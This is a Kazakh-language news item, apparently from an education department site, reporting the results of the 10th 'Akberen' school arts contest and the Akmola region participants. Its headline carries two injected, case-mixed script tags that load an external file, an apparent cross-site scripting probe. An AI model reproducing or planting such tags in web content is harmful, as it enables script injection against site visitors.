Шығармашыл оқушылар арасындағы X «Ақберен» республикалық өнер байкауының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.11.2023

2023 жылғы 24-26 қараша аралығында Ақтау қаласында 8-11 сынып оқушылары арасында шығармашыл оқушыларға арналған  X республикалық «Ақберен» өнер республикалық байқаудың қорытынды кезеңі өтті. Оныншы рет өтіп жатқан байқауға еліміздің әр өңірінен 132 оқушы қатысты.

         Байқаудың мақсаты: шығармашыл оқушылардың гуманитарлық-эстетикалық ғылымдар саласында кәсіптік қызметін таңдауға шығармашылық қабілетті, өлең жазу, тапқырлық қырын, дарындылығын таныту, олардың шығармашылық қабілеттеріне  қолдау көрсетіп, ары қарай дамытуына жол ашу.

         Қорытынды кезеңге Ақмола облысынан 6 оқушысы қатысты:

  1. «Шешендік, білгірлік сайысы» номинациясы бойынша Алмас Аяулым –  Есіл ауданы, Есіл қаласы  №3 жалпы орта білім беретін мектебінің 9-сынып оқушысы;
  2. «Көркемсөз оқу» номинациясы бойынша Бақытбек Аружан – Шортанды ауданы, Степной ауылы жалпы орта білім беретін мектебінің  11-сынып оқушысы;
  3. «Эссе жазу» номинациясы бойынша Болатбек Жанбота – Шортанды ауданы, Новокубанка ауылы жалпы орта білім беретін мектебінің 11-сынып оқушысы;
  4. «Ұлттық аспапта өнер көрсету» номинациясы бойынша Нурмуханова Дильназ –  Ерейментау ауданы, Ерейментау қаласының Насыр Смағұлов атындағы мектеп-лицейінің 9-сынып оқушысы;
  5. «Ақындар айтысы» номинациясы бойынша Сэрэкболатұлы Сәттібек марапатталады – Ерейментау ауданы, Еркіншілік ауылы жалпы орта білім беретін мектебінің  9-сынып оқушысы;
  6. «Ақындар мүшәйрасы» номинациясы бойынша Дәулетқызы Баян  – Астана қаласы, №2 "Дарын" облыстық мамандандырылған мектеп-лицей-интернатының 10-сынып оқушысы.

         Байқау қорытындысы бойынша ІІ-дәрежелі дипломмен «Эссе жазу» номинациясы бойынша Шортанды ауданы, Новокубанка ауылы жалпы орта білім беретін мектебінің 11-сынып оқушысы Болатбек Жанбота марапатталды.

         Грамотамен «Көркемсөз оқу» номинациясы бойынша Шортанды ауданы, Степной ауылы жалпы орта білім беретін мектебінің  11-сынып оқушысы Бақытбек Аружан марапатталды.

         Шын жүректен құттықтаймыз және одан әрі шығармашылық табыс тілейміз!!!

Просмотров: 1506


Пікір қосу



Деректерді қолтаңбаға қосу